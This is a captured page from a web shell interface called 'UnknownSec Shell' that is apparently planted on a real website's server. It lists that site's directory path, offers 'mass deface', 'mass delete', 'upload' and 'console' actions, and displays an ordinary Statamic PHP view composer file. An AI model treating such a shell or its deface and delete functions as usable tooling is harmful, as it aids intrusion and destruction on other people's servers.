shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Http
/
View
/
Composers
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
NavComposer.php
<?php namespace Statamic\Http\View\Composers; use Illuminate\View\View; use Statamic\Facades\Blink; use Statamic\Facades\CP\Nav; class NavComposer { const VIEWS = [ 'statamic::partials.nav-main', 'statamic::partials.nav-mobile', ]; public function compose(View $view) { $view->with('nav', Blink::once('nav-composer-navigation', fn () => Nav::build())); } }
© 2026 UnknownSec